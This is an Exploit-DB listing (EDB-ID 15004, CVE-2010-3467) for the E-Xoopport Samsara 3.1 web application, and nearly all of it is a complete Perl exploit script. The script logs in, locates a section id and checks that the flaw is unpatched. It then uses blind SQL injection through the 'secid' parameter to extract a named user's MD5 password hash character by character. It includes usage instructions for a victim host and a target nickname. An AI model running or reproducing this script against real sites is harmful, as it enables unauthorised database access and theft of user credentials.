ad

E-Xoopport - Samsara <= 3.1 - (Sections Module) Remote Blind SQL Injection Exploit



EDB-ID: 15004 CVE: 2010-3467 OSVDB-ID: 68083
Author: _mRkZ_ Published: 2010-09-14 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (Sections Module 2) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_ & Dante90, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Web Site: www.warwolfz.org

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

$^O eq 'MSWin32' ? system('cls') : system('clear');

print "
E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew         |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
";

if (@ARGV != 4) {
	print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
	exit;
}

$host    = $ARGV[0];
$usr     = $ARGV[1];
$pwd     = $ARGV[2];
$anickde = $ARGV[3];
$anick   = '0x'.EncHex($anickde);

print "[+] Logging In...\r\n";
my %postdata = (
	uname => "$usr",
	pass => "$pwd"
);
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req		= (POST $host, \%postdata);
my $cookies = HTTP::Cookies->new();
$request	= $ua->request($req);
$ua->cookie_jar($cookies);
$content	= $request->content;
if ($content =~ /<head><meta http-equiv="Refresh" content="0; URL=modules\/news\/" \/><\/head>/i) {
	print "[+] Logged in\r\n";
} else {
	print "[-] Fatal Error: username/password incorrect?\r\n";
	exit;
}

print "[!] Retriving section id...\r\n";
$idi = 0;
while ($idi != 11) {
	$idi++;
	$ua = LWP::UserAgent->new;
	$ua->agent("Mozilla 5.0");
	my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$idi";
	$request	= $ua->get($req);
	$ua->cookie_jar($cookies);
	$content	= $request->content;
	if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
		$secid = $idi;
		last;
	}
}

if(!defined $secid) {
	print "[-] Fatal Error: Section id not found!\r\n";
	exit;
} else {
	print "[+] Section id '$secid' retrieved\r\n";
}

print "[!] Checking path...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid";
$request	= $ua->get($req);
$ua->cookie_jar($cookies);
$content	= $request->content;
if ($content =~ /Ecco i documenti della sezione/i) {
	print "[+] Correct Path\r\n";
} else {
	print "[-] Fatal Error: Wrong Path\r\n";
	exit;
}

print "[!] Checking if vulnerability has been fixed...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+1=1";
$request	= $ua->get($req);
$ua->cookie_jar($cookies);
$content	= $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
	print "[+] Vulnerability has not been fixed...\r\n";
} else {
	print "[-] Fatal Error: Vulnerability has been fixed\r\n";
	open LOGG, ">log.html";
	print LOGG $content;
	close LOGG;
	exit;
}

print "[!] Checking nick to hack...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),32,1))>0";
$request	= $ua->get($req);
$ua->cookie_jar($cookies);
$content	= $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
	print "[+] Nick exists...\r\n";
} else {
	print "[-] Fatal Error: Nick does not exists\r\n";
	exit;
}

print "[!] Exploiting...\r\n";
my $i = 1;
while ($i != 33) {
	my $wn	= 47;
	while (1) {
		$wn++;
		$ua = LWP::UserAgent->new;
		$ua->agent("Mozilla 5.0");
		my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
		$request	= $ua->get($req);
		$ua->cookie_jar($cookies);
		$content	= $request->content;
		if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
			$pwdchr .= chr($wn);
			$^O eq 'MSWin32' ? system('cls') : system('clear');
			PrintChars($anickde, $pwdchr, $secid);
			last;
		}
	}
	$i++;
}

print "\r\n[+] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.net\r\n\r\n";

sub PrintChars {
$anick1 = $_[0];
$chars = $_[1];
$secid = $_[2];
print "
E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew         |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
[+] Logging In...
[+] Logged in
[!] Retriving section id...
[+] Section id '$secid' retrived
[!] Checking path...
[+] Correct Path
[!] Checking if vulnerability has been fixed...
[+] Vulnerability has not been fixed...
[!] Checking nick to hack...
[+] Nick exists...
[!] Exploiting...
[+] ".$anick1."'s md5 Password: $chars
";
}

sub EncHex {
	$char = $_[0];
	chomp $char;
	@trans = unpack("H*", "$char");
	return $trans[0];
}